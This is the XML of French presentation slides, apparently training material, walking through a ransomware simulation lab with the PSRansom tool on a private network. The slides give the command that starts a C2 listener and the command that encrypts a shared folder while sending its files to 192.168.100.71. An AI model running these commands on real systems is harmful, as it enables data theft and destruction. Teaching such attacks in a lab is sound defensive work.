          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="29128" r="29128"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3366570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texte 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A01680CD-2C3E-4088-836C-00240194C98F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630238" y="1309688"/>
            <a:ext cx="10723562" cy="4185761"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PSRansom permet de simuler une attaque de type ransomware à travers un scénario impliquant deux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>machines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="2000" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0"/>
              <a:t>Un serveur Command &amp; Control (C2) : chargé de recevoir les données exfiltrées via des requêtes HTTP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0"/>
              <a:t>Une machine cible : sur laquelle est exécuté un script PowerShell représentant le ransomware. Celui-ci chiffre les fichiers d’un volume ou d’un répertoire spécifique à l’aide de l’algorithme AES-256.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0"/>
              <a:t>Le chiffrement est réalisé par une fonction PowerShell intégrée au script. Une fois les données chiffrées, un fichier texte contenant la clé de déchiffrement est généré sur le serveur, permettant de simuler une fonction de restauration. Cette fonctionnalité offre la possibilité d’un retour arrière, essentielle dans un cadre de démonstration ou de test sécurisé.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du pied de page 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D312B3E5-C36F-4A80-BB5D-D658B0E2DF1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7487298" y="6405344"/>
            <a:ext cx="4114800" cy="288147"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>Schola </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00CF77"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nova</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Espace réservé du numéro de diapositive 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B88C7E9-4B1F-4873-8AA8-F1FF1DAF07DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30471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456B5980-B1F2-4604-A44E-86243A8352F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="558165"/>
            <a:ext cx="3946383" cy="424732"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Déployer le serveur c2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du pied de page 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D312B3E5-C36F-4A80-BB5D-D658B0E2DF1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7459211" y="6442589"/>
            <a:ext cx="4114800" cy="288147"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>Schola </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00CF77"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nova</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Espace réservé du numéro de diapositive 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B88C7E9-4B1F-4873-8AA8-F1FF1DAF07DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du texte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB9647AB-0E94-8319-5B2A-6A52A732342B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442835" y="982897"/>
            <a:ext cx="9890125" cy="5998565"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0"/>
              <a:t>Dans notre machine kali linux on installe PowerShell avec les deux commandes :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sudo apt-get update </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo apt-get Install PowerShell   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensuite on va cloner le projet PSRansom en local pour récupérer les sources de notre ransomware fictif : avec la commande : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>git clone   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://github.com/JoelGMSec/PSRansom</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F46"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>C2Server.ps1 à exécuter sur le serveur C2 pour le démarrer et qu'il soit en écoute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F46"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>PSRansom.ps1 à exécuter sur le serveur compromis pour chiffrer les données</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F46"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PT Sans" panose="020B0503020203020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> la commande  pour que</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F46"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PT Sans" panose="020B0503020203020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> le serveur C2 soit en écoute sur toutes ses interfaces et sur le port 80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F46"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PT Sans" panose="020B0503020203020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> est: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="inherit"/>
              </a:rPr>
              <a:t>pwsh ./C2Server.ps1 + 80 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" i="0" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="inherit"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Image 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8702CF4-ADF7-09F6-E569-6CAA0B9D5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2962278"/>
            <a:ext cx="5506218" cy="1486107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2347512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456B5980-B1F2-4604-A44E-86243A8352F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="558165"/>
            <a:ext cx="5964820" cy="424732"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Simuler l’attaque par ransomware </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du pied de page 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D312B3E5-C36F-4A80-BB5D-D658B0E2DF1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7459211" y="6442589"/>
            <a:ext cx="4114800" cy="288147"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>Schola </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00CF77"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nova</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Espace réservé du numéro de diapositive 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B88C7E9-4B1F-4873-8AA8-F1FF1DAF07DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du texte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB9647AB-0E94-8319-5B2A-6A52A732342B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="442835" y="982897"/>
            <a:ext cx="10017217" cy="5466112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>On va simuler une attaque sur la machine Windows compromise on exécute manuellement le script PSRansom.ps1  avec la commande </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PSRansom.ps1 -e "C:\Partage" -s 192.168.100.71 -p 80 –x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(pour s’attaquer par exmple au répertoir partagé c) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>exfiltrer les données en clair vers le serveur C2 accessible à l'adresse 192.168.100.71:80.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Du côté du serveur C2, on peut voir qu'une connexion est établie, et nous avons des détails sur l'hôte compromis. La clé de déchiffrement est également spécifiée, ainsi que le nom des fichiers reçus par le serveur C2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3F3F46"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="PT Sans" panose="020B0503020203020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>D'ailleurs, les fichiers exfiltrés sont visibles dans le répertoire "C2Files" présente sur le serveur C2) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Sur le serveur compromis, les données ont hérité de l'extension ".</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>psr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>" et elles sont illisibles, car elles sont chiffrées </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Image 2" descr="Une image contenant texte, Police, capture d’écran, blanc&#10;&#10;Le contenu généré par l’IA peut être incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{434C4249-17B7-0413-1F2A-EE3DC137A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4280801"/>
            <a:ext cx="4744462" cy="1162212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2098907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456B5980-B1F2-4604-A44E-86243A8352F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="558165"/>
            <a:ext cx="3967606" cy="424732"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Restaurer les données </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du pied de page 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
